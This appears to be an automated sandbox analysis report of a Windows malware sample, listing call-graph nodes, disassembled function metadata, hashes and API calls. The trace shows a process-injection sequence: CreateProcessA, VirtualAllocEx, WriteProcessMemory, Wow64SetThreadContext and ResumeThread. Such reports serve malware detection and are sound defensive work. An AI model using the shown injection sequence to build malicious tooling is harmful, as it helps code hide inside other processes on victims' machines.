WriteProcessMemory 50919->50921 50922 7b5d7c8 WriteProcessMemory 50919->50922 50920 f0310bd 50921->50920 50922->50920 50979 7b5dcb0 50923->50979 50983 7b5dcb8 50923->50983 50924 f030a84 50924->50822 50928 f030e7a 50927->50928 50930 7b5d7c0 WriteProcessMemory 50928->50930 50931 7b5d7c8 WriteProcessMemory 50928->50931 50929 f030e9e 50930->50929 50931->50929 50933 f03103c 50932->50933 50934 7b5d700 VirtualAllocEx 50932->50934 50935 7b5d708 VirtualAllocEx 50932->50935 50934->50933 50935->50933 50987 7b5de44 50936->50987 50991 7b5de50 50936->50991 50941 f030f49 50940->50941 50943 7b5d580 ResumeThread 50941->50943 50944 7b5d578 ResumeThread 50941->50944 50942 f030f5e 50943->50942 50944->50942 50946 f030cec 50945->50946 50948 7b5d580 ResumeThread 50946->50948 50949 7b5d578 ResumeThread 50946->50949 50947 f030f5e 50948->50947 50949->50947 50951 7b5d810 WriteProcessMemory 50950->50951 50953 7b5d867 50951->50953 50953->50894 50955 7b5d810 WriteProcessMemory 50954->50955 50957 7b5d867 50955->50957 50957->50894 50959 7b5d675 Wow64SetThreadContext 50958->50959 50961 7b5d6bd 50959->50961 50961->50898 50963 7b5d675 Wow64SetThreadContext 50962->50963 50965 7b5d6bd 50963->50965 50965->50898 50967 7b5d5c0 ResumeThread 50966->50967 50969 7b5d5f1 50967->50969 50969->50900 50971 7b5d705 50970->50971 50972 7b5d6da 50971->50972 50973 7b5d752 VirtualAllocEx 50971->50973 50972->50916 50974 7b5d785 50973->50974 50974->50916 50976 7b5d748 VirtualAllocEx 50975->50976 50978 7b5d785 50976->50978 50978->50916 50980 7b5dcb8 ReadProcessMemory 50979->50980 50982 7b5dd47 50980->50982 50982->50924 50984 7b5dd03 ReadProcessMemory 50983->50984 50986 7b5dd47 50984->50986 50986->50924 50988 7b5de50 CreateProcessA 50987->50988 50990 7b5e09b 50988->50990 50992 7b5ded9 CreateProcessA 50991->50992 50994 7b5e09b 50992->50994 50718 5778ac0 50719 5778aed 50718->50719 50748 5778568 50719->50748 50721 5778b69 50753 5778578 50721->50753 50723 5778b92 50724 5778568 CreateWindowExW 50723->50724 50725 5778cf2 50724->50725 50726 5778568 CreateWindowExW 50725->50726 50727 5778d1b 50726->50727 50728 5778568 CreateWindowExW 50727->50728 50729 5778d44 50728->50729 50730 5778568 CreateWindowExW 50729->50730 50731 5778d6d 50730->50731 50732 5778568 CreateWindowExW 50731->50732 50733 5778d96 50732->50733 50734 5778568 CreateWindowExW 50733->50734 50735 5778dbf 50734->50735 50736 5778568 CreateWindowExW 50735->50736 50737 5778de8 50736->50737 50738 5778568 CreateWindowExW 50737->50738 50739 5778e11 50738->50739 50740 5778568 CreateWindowExW 50739->50740 50741 5778e40 50740->50741 50742 5778568 CreateWindowExW 50741->50742 50743 5778e72 50742->50743 50744 5778568 CreateWindowExW 50743->50744 50745 5778f95 50744->50745 50746 5778568 CreateWindowExW 50745->50746 50747 5778fc7 50746->50747 50749 5778573 50748->50749 50752 1787860 CreateWindowExW 50749->50752 50758 178896f 50749->50758 50750 577ddfb 50750->50721 50752->50750 50754 5778583 50753->50754 50756 178896f CreateWindowExW 50754->50756 50757 1787860 CreateWindowExW 50754->50757 50755 577eccf 50755->50723 50756->50755 50757->50755 50759 17889ab 50758->50759 50760 1788c71 50759->50760 50761 178cfc0 CreateWindowExW 50759->50761 50760->50750 50761->50760 50791 7b5a3ed 50792 7b5a3fd 50791->50792 50794 7b5d181 ResumeThread 50792->50794 50795 7b5d190 ResumeThread 50792->50795 50793 7b5a990 50794->50793 50795->50793 50796 178d6a0 50797 178d6a5 GetCurrentProcess 50796->50797 50799 178d738 GetCurrentThread 50797->50799 50800 178d731 50797->50800 50801 178d76e 50799->50801 50802 178d775 GetCurrentProcess 50799->50802 50800->50799 50801->50802 50803 178d7ab 50802->50803 50804 178d7d3 GetCurrentThreadId 50803->50804 50805 178d804 50804->50805 50615 7b5a63f 50616 7b5a65f 50615->50616 50620 7b5d181 50616->50620 50624 7b5d190 50616->50624 50617 7b5a686 50621 7b5d1c3 50620->50621 50622 7b5d231 50621->50622 50628 7b5d578 50621->50628 50622->50617 50625 7b5d1c3 50624->50625 50626 7b5d231 50625->50626 50627 7b5d578 ResumeThread 50625->50627 50626->50617 50627->50626 50629 7b5d552 50628->50629 50630 7b5d57f ResumeThread 50628->50630 50629->50622 50632 7b5d5f1 50630->50632 50632->50622 50708 f0317a8 50709 f031933 50708->50709 50710 f0317ce 50708->50710 50710->50709 50713 f031a20 50710->50713 50716 f031a28 PostMessageW 50710->50716 50714 f031a28 PostMessageW 50713->50714 50715 f031a94 50714->50715 50715->50710 50717 f031a94 50716->50717 50717->50710

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 093B78E8 Relevance: 6.9, Strings: 5, Instructions: 608COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 294 93b78e8-93b8198 297 93b867b-93b86e4 294->297 298 93b819e-93b81a3 294->298 305 93b86eb-93b8773 297->305 298->297 299 93b81a9-93b81c6 298->299 299->305 306 93b81cc-93b81d0 299->306 346 93b877e-93b87fe 305->346 307 93b81df-93b81e3 306->307 308 93b81d2-93b81dc call 93b031c 306->308 309 93b81f2-93b81f9 307->309 310 93b81e5-93b81ef call 93b031c 307->310 308->307 315 93b81ff-93b822f 309->315 316 93b8314-93b8319 309->316 310->309 326 93b89fe-93b8a14 315->326 330 93b8235-93b8308 call 93b35c0 * 2 315->330 319 93b831b-93b831f 316->319 320 93b8321-93b8326 316->320 319->320 323 93b8328-93b832c 319->323 324 93b8338-93b8368 call 93b78f8 * 3 320->324 323->326 327 93b8332-93b8335 323->327 324->346 347 93b836e-93b8371 324->347 327->324 330->316 355 93b830a 330->355 363 93b8805-93b8887 346->363 347->346 350 93b8377-93b8379 347->350 350->346 352 93b837f-93b83b4 350->352 362 93b83ba-93b83c3 352->362 352->363 355->316 364 93b83c9-93b8423 call 93b78f8 * 2 call 93b7908 * 2 362->364 365 93b8526-93b852a 362->365 368 93b888f-93b8911 363->368 411 93b8435 364->411 412 93b8425-93b842e 364->412 365->368 369 93b8530-93b8534 365->369 373 93b8919-93b8946 368->373 372 93b853a-93b8540 369->372 369->373 376 93b8542 372->376 377 93b8544-93b8579 372->377 386 93b894d-93b89cd 373->386 382 93b8580-93b8586 376->382 377->382 382->386 387 93b858c-93b8594 382->387 446 93b89d4-93b89f6 386->446 393 93b859b-93b859d 387->393 394 93b8596-93b859a 387->394 399 93b85ff-93b8605 393->399 400 93b859f-93b85c3 393->400 394->393 405 93b8607-93b8622 399->405 406 93b8624-93b8652 399->406 429 93b85cc-93b85d0 400->429 430 93b85c5-93b85ca 400->430 426 93b865a-93b8666 405->426 406->426 416 93b8439-93b843b 411->416 412->416 417 93b8430-93b8433 412->417 424 93b843d 416->424 425 93b8442-93b8446 416->425 417->416 424->425 427 93b8448-93b844f 425->427 428 93b8454-93b845a 425->428 445 93b866c-93b8678 426->445 426->446 432 93b84f1-93b84f5 427->432 433 93b845c-93b8462 428->433 434 93b8464-93b8469 428->434 429->326 437 93b85d6-93b85d9 429->437 435 93b85dc-93b85ed 430->435 441 93b84f7-93b8511 432->441 442 93b8514-93b8520 432->442 443 93b846f-93b8475 433->443 434->443 480 93b85ef call 93b8a98 435->480 481 93b85ef call 93b8a87 435->481 437->435 441->442 442->364 442->365 451 93b847b-93b8480 443->451 452 93b8477-93b8479 443->452 446->326 448 93b85f5-93b85fd 448->426 455 93b8482-93b8494 451->455 452->455 461 93b849e-93b84a3 455->461 462 93b8496-93b849c 455->462 463 93b84a9-93b84b0 461->463 462->463 466 93b84b2-93b84b4 463->466 467 93b84b6 463->467 471 93b84bb-93b84c6 466->471 467->471 472 93b84ea 471->472 473 93b84c8-93b84cb 471->473 472->432 473->432 475 93b84cd-93b84d3 473->475 476 93b84da-93b84e3 475->476 477 93b84d5-93b84d8 475->477 476->432 479 93b84e5-93b84e8 476->479 477->472 477->476 479->432 479->472 480->448 481->448
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                      • API String ID: 0-1677660839
                                                                                                                                                                      • Opcode ID: 41f41efc9764d2181b8c35ceb796ae9d41356a78bb80e73d5ed7c8153389b329
                                                                                                                                                                      • Instruction ID: 3e59fb34248c5ba72ae84212e6e9916ee421fa805b369c7e24c98fc02e2d3278
                                                                                                                                                                      • Opcode Fuzzy Hash: 41f41efc9764d2181b8c35ceb796ae9d41356a78bb80e73d5ed7c8153389b329
                                                                                                                                                                      • Instruction Fuzzy Hash: 61327B30A002188FDB64DFA8C8547AEBBF6BF84300F1485AAD509AF795DB349D46CF95
                                                                                                                                                                      Function 07B51310 Relevance: .5, Instructions: 506COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a8880dfd13b4a1fb7c8c616314ea45492709e2226f16c097a40b1db55dd204bc
                                                                                                                                                                      • Instruction ID: e6d9d12f012e723a82bfb752af3988d6222187417fc79d7c5825d4f7320a0f25
                                                                                                                                                                      • Opcode Fuzzy Hash: a8880dfd13b4a1fb7c8c616314ea45492709e2226f16c097a40b1db55dd204bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B427FB4E1121DCFDB64CFA9C984B9DBBB2BF48310F1581A9E819A7355D730AA81CF50
                                                                                                                                                                      Function 07B50040 Relevance: .5, Instructions: 482COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f7b17699c71d9081d5b08f8b20ccfe97bdbc3ac34690d273f710659e3538858a
                                                                                                                                                                      • Instruction ID: b94d4801aebdff35ed256145782cb6cd808701b56643bd934f2ddd66d0c4f366
                                                                                                                                                                      • Opcode Fuzzy Hash: f7b17699c71d9081d5b08f8b20ccfe97bdbc3ac34690d273f710659e3538858a
                                                                                                                                                                      • Instruction Fuzzy Hash: 5732D2B0901219CFEB50DF69C580A8EFBB2FF48315F55D195E848AB212DB30E985CFA4
                                                                                                                                                                      Function 0F0323A8 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1735765744.000000000F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F030000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f030000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f9c793d401fa9f1e339b0b4df28b3b85a42a9aed909f56736c8b55d7010cab51
                                                                                                                                                                      • Instruction ID: d79bbe1513d5a2e0ac2fa1734900bace2bc94e636762b96a663ce123b48256d7
                                                                                                                                                                      • Opcode Fuzzy Hash: f9c793d401fa9f1e339b0b4df28b3b85a42a9aed909f56736c8b55d7010cab51
                                                                                                                                                                      • Instruction Fuzzy Hash: 53C1CB70B016008FDB29EB75C460BAEB7FAAF89700F5484ADD146CB295DF34E901CB52
                                                                                                                                                                      Function 093B8160 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 343bfaaf1e5dcae4bf07e258e713ddcc797b205ebb93be6a731dcb528d55d8ef
                                                                                                                                                                      • Instruction ID: 5f4015b8d7dbe8f38786c3ad025dbdadd138f5400f3f0e764cb0fa0e52dbf067
                                                                                                                                                                      • Opcode Fuzzy Hash: 343bfaaf1e5dcae4bf07e258e713ddcc797b205ebb93be6a731dcb528d55d8ef
                                                                                                                                                                      • Instruction Fuzzy Hash: 18C13A31E002588FCB15DFA9C8807DEBBB6AF88300F14C5AADA49AF655DB34D985CF51
                                                                                                                                                                      Function 07B51300 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5f8fe6e0b8a8f51537f07d7bef35f34131bc8b1f307820d2861ea8fef5b9800c
                                                                                                                                                                      • Instruction ID: b72d2cca4c8685e5f5f03dc38301de0a1ccb4269466e64936a6162f1c88fda04
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f8fe6e0b8a8f51537f07d7bef35f34131bc8b1f307820d2861ea8fef5b9800c
                                                                                                                                                                      • Instruction Fuzzy Hash: BA61A3B4E01218CFEB18CF9AD994B9DBBF2BF88310F1481A9E809A7354DB719941CF50
                                                                                                                                                                      Function 07B54100 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fc9846eb80f61865d93330c2067c55b48e3bcb1324c18ba397957fc9118dd5fe
                                                                                                                                                                      • Instruction ID: e9230582f0286bfb4a48f18864b0304f8f3bc08dcdbbf67e39ae968e34905ec3
                                                                                                                                                                      • Opcode Fuzzy Hash: fc9846eb80f61865d93330c2067c55b48e3bcb1324c18ba397957fc9118dd5fe
                                                                                                                                                                      • Instruction Fuzzy Hash: 1D5183B5D116199FDB04CFEAD9446EEBBF2FF89300F10806AE819AB254DB345946CF40
                                                                                                                                                                      Function 017875E3 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 39dcc30711f530faca070d57c606e12eca3c86ae3530cfb87c34f75c35819592
                                                                                                                                                                      • Instruction ID: 2f6706c35b4977bc8424de97dfb64734462daac2282c2bb4fa82c6a76c8048f5
                                                                                                                                                                      • Opcode Fuzzy Hash: 39dcc30711f530faca070d57c606e12eca3c86ae3530cfb87c34f75c35819592
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B41B770E012099FDB08DFA9D8549EEFBF2AF88310F148469D419AB364DB359946CB91
                                                                                                                                                                      Function 07B540F0 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6713f862c70d22845d8201529fbb925e329d650f8c4f7e7ce671838b57a3568e
                                                                                                                                                                      • Instruction ID: f6f3f1f9cdb802745e8e18aeb6128321ac10ab3572bc75098e368d7b9f8a7277
                                                                                                                                                                      • Opcode Fuzzy Hash: 6713f862c70d22845d8201529fbb925e329d650f8c4f7e7ce671838b57a3568e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A41AFB5E016198FDB08CFEAD9846AEBBF2AF88300F14C06AD419AB354DB345946CF40
                                                                                                                                                                      Function 07B5003A Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 254574a333cffeb52ea0fa393659a7a175a012d8b8f6b8473c0a010359a3a9f8
                                                                                                                                                                      • Instruction ID: 25ba74e89c7e84b310c73ebc1fb811c89c5f7c5b018024e1199086afbb78d586
                                                                                                                                                                      • Opcode Fuzzy Hash: 254574a333cffeb52ea0fa393659a7a175a012d8b8f6b8473c0a010359a3a9f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 8241B7B1E006198FEB58DFAAC94079EBBF3BF88300F14C1A9D559A7355EB300A859F51
                                                                                                                                                                      Function 017842BC Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d8ff49ae3c5e51b28b71ef48218105ed900f7d7465ec1f68d1b0c30eb1a5312d
                                                                                                                                                                      • Instruction ID: 3ff595aeefada1f2ee2cbab27670e5205affc0df424137169985ce9de7a24117
                                                                                                                                                                      • Opcode Fuzzy Hash: d8ff49ae3c5e51b28b71ef48218105ed900f7d7465ec1f68d1b0c30eb1a5312d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9041A470E01209DFDB08DFA9D8949EEFBF2BF88310F148579E419A7364DB3599468B90
                                                                                                                                                                      Function 07B57F68 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8af06884f63d9d24d9f9a68e7b8a8d0cc618a72bae41de5ca3dd56fb4c634545
                                                                                                                                                                      • Instruction ID: 3993204e92030b6e7f58e0f5151a216993741e34f6c46fcda6c7ca9d1f4ae32f
                                                                                                                                                                      • Opcode Fuzzy Hash: 8af06884f63d9d24d9f9a68e7b8a8d0cc618a72bae41de5ca3dd56fb4c634545
                                                                                                                                                                      • Instruction Fuzzy Hash: BC31EAB0D14658DBEB18CFAAD8457DEBBF6BF8A300F04C569D809A7254DB740946CF81
                                                                                                                                                                      Function 0F030E5F Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1735765744.000000000F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F030000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f030000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8202d9cb47aa2b96ee70f08ec04e631803ed20b0913c406ed5dd9b902045e708
                                                                                                                                                                      • Instruction ID: 81679c03af04239882d481f67689273a6813ad07a4a4ff9419df8ac89520377f
                                                                                                                                                                      • Opcode Fuzzy Hash: 8202d9cb47aa2b96ee70f08ec04e631803ed20b0913c406ed5dd9b902045e708
                                                                                                                                                                      • Instruction Fuzzy Hash: 80A00126CCF505D197500C6815A00F9D12D474F058A82B202841E32847822980044218
                                                                                                                                                                      Function 0178D690 Relevance: 6.1, APIs: 4, Instructions: 137threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 482 178d690-178d69e 483 178d6a0-178d6a4 482->483 484 178d6a5-178d72f GetCurrentProcess 482->484 483->484 488 178d738-178d76c GetCurrentThread 484->488 489 178d731-178d737 484->489 490 178d76e-178d774 488->490 491 178d775-178d7a9 GetCurrentProcess 488->491 489->488 490->491 493 178d7ab-178d7b1 491->493 494 178d7b2-178d7cd call 178d873 491->494 493->494 496 178d7d3-178d802 GetCurrentThreadId 494->496 498 178d80b-178d86d 496->498 499 178d804-178d80a 496->499 499->498
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0178D71E
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0178D75B
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0178D798
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0178D7F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                      • Opcode ID: 132eb8f1c7bdabed8aa1962511dfa80eef039b2f0a4febe1276fcd56e0842048
                                                                                                                                                                      • Instruction ID: 03f2a33e5cd08ff1f70c0fc9caa2e91c5db2dca5618ab4ce0d7a4f85cefd8ff2
                                                                                                                                                                      • Opcode Fuzzy Hash: 132eb8f1c7bdabed8aa1962511dfa80eef039b2f0a4febe1276fcd56e0842048
                                                                                                                                                                      • Instruction Fuzzy Hash: DC5144B0900349CFDB14EFA9D548B9EBFF1EF48314F248569E049A72A0DB74A884CF65
                                                                                                                                                                      Function 0178D6A0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 506 178d6a0-178d72f GetCurrentProcess 511 178d738-178d76c GetCurrentThread 506->511 512 178d731-178d737 506->512 513 178d76e-178d774 511->513 514 178d775-178d7a9 GetCurrentProcess 511->514 512->511 513->514 516 178d7ab-178d7b1 514->516 517 178d7b2-178d7cd call 178d873 514->517 516->517 519 178d7d3-178d802 GetCurrentThreadId 517->519 521 178d80b-178d86d 519->521 522 178d804-178d80a 519->522 522->521
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0178D71E
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 0178D75B
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0178D798
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0178D7F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                                                      • Opcode ID: 9865618190d6b758b6506083e9e5080a8ffd976c5caa758ce369ea320e2f669e
                                                                                                                                                                      • Instruction ID: b6ec99c23ec308474618bb55032b316c964c58e55cdbe9e9558d12712cae9832
                                                                                                                                                                      • Opcode Fuzzy Hash: 9865618190d6b758b6506083e9e5080a8ffd976c5caa758ce369ea320e2f669e
                                                                                                                                                                      • Instruction Fuzzy Hash: DE5133B0901349CFDB14EFA9D548BAEFFF1EB48314F208469E019A72A0DB749984CF65
                                                                                                                                                                      Function 07B5DE44 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 2921 7b5de44-7b5dee5 2924 7b5dee7-7b5def1 2921->2924 2925 7b5df1e-7b5df3e 2921->2925 2924->2925 2926 7b5def3-7b5def5 2924->2926 2932 7b5df77-7b5dfa6 2925->2932 2933 7b5df40-7b5df4a 2925->2933 2927 7b5def7-7b5df01 2926->2927 2928 7b5df18-7b5df1b 2926->2928 2930 7b5df05-7b5df14 2927->2930 2931 7b5df03 2927->2931 2928->2925 2930->2930 2934 7b5df16 2930->2934 2931->2930 2941 7b5dfdf-7b5e099 CreateProcessA 2932->2941 2942 7b5dfa8-7b5dfb2 2932->2942 2933->2932 2935 7b5df4c-7b5df4e 2933->2935 2934->2928 2937 7b5df71-7b5df74 2935->2937 2938 7b5df50-7b5df5a 2935->2938 2937->2932 2939 7b5df5c 2938->2939 2940 7b5df5e-7b5df6d 2938->2940 2939->2940 2940->2940 2943 7b5df6f 2940->2943 2953 7b5e0a2-7b5e128 2941->2953 2954 7b5e09b-7b5e0a1 2941->2954 2942->2941 2944 7b5dfb4-7b5dfb6 2942->2944 2943->2937 2946 7b5dfd9-7b5dfdc 2944->2946 2947 7b5dfb8-7b5dfc2 2944->2947 2946->2941 2948 7b5dfc4 2947->2948 2949 7b5dfc6-7b5dfd5 2947->2949 2948->2949 2949->2949 2951 7b5dfd7 2949->2951 2951->2946 2964 7b5e138-7b5e13c 2953->2964 2965 7b5e12a-7b5e12e 2953->2965 2954->2953 2967 7b5e14c-7b5e150 2964->2967 2968 7b5e13e-7b5e142 2964->2968 2965->2964 2966 7b5e130 2965->2966 2966->2964 2969 7b5e160-7b5e164 2967->2969 2970 7b5e152-7b5e156 2967->2970 2968->2967 2971 7b5e144 2968->2971 2973 7b5e176-7b5e17d 2969->2973 2974 7b5e166-7b5e16c 2969->2974 2970->2969 2972 7b5e158 2970->2972 2971->2967 2972->2969 2975 7b5e194 2973->2975 2976 7b5e17f-7b5e18e 2973->2976 2974->2973 2978 7b5e195 2975->2978 2976->2975 2978->2978
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B5E086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
